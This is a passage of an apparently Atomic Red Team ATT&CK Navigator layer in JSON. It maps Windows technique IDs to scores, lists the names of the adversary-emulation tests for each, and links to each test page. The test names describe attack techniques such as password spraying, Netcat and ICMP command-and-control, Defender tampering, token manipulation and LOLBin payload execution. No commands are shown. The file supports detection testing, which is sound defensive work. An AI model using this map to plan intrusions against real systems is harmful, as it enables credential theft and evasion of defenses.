Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence 
(HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload 
Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - 
Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT 
